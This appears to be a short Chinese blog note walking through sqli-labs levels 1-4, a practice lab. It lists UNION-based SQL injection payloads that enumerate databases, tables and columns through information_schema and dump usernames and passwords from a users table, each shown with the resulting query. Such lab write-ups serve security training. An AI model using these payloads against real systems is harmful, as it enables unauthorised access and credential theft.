sqlilabs 1-4
near '1' --+ ' LIMIT 0,1
?id=999' union select 1,database(),5 --+ 当前数据库
?id=999' union select 1,user(),5 --+ 当前用户名
爆数据库
?id=-1' union select 1,group_concat(schema_name),5 from information_schema.schemata --+
SELECT * FROM users WHERE id='-1'union select 1,group_concat(schema_name),3 from information_schema.schemata --+ LIMIT 0,1
爆 security 数据表
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+
SELECT * FROM users WHERE id='-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+ LIMIT 0,1
爆users表的列
?id=-1' union select 1,group_concat(column_name),5 from information_schema.columns where table_name='users' --+
SELECT * FROM users WHERE id='-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+ LIMIT 0,1
爆 users 的所有数据
?id=-1' union select 1,group_concat(username),group_concat(password) from users --+
SELECT * FROM users WHERE id='-1'union select 1,group_concat(username),group_concat(password) from users --+ LIMIT 0,1
最新文章
- 关于 bind 你可能需要了解的知识点以及使用场景
- vim 配置
- PIC32MZ tutorial -- 32-bit Timer
- 构造 Codeforces Round #302 (Div. 2) B Sea and Islands
- hadoop-2.7.0
- php删除数组中相同的元素,只保留一个相同元素
- maven 项目中使用 jstl标签
- PHP 13: 类
- Unity 3d中Shader是什么,可以吃吗?
- mysql source 报错 Unknown command '\'' 解决办法
- 新笔记tst
- 2019中山大学程序设计竞赛-Monitor
- 压测过程中出现ops断崖式下跌原因及排解
- jenkins发送生成的html报告作为邮件附件,但无内容的问题分析
- org.apache.poi 读取数字问题
- 谈谈jQuery中的数据类型检测
- move UVs of a texture
- 2.9 C++使用默认参数的构造函数
- javascript第一天知识点
- (转)Maven学习总结(一)——Maven入门 安装使用
热门文章
- Android BLE与终端通信(五)——Google API BLE4.0低功耗蓝牙文档解读之案例初探
- Warning: $HADOOP_HOME is deprecated解决方法
- 数据结构基础(2) --顺序查找 &; 二分查找
- 安全退出app,activoty栈管理
- cat .git/config查看远端服务器信息(git的配置信息:远端服务器连接信息)
- HibernateTemplate 查询原生sql及ljava.lang.object cannot be cast to
- 100个Myeclipse6.5免费注册码
- 为多态基类声明virtual析构函数
- FPGrowth 实现
- 分布式版本库——Windows下Git的环境部署以及在GitHub上开源自己的项目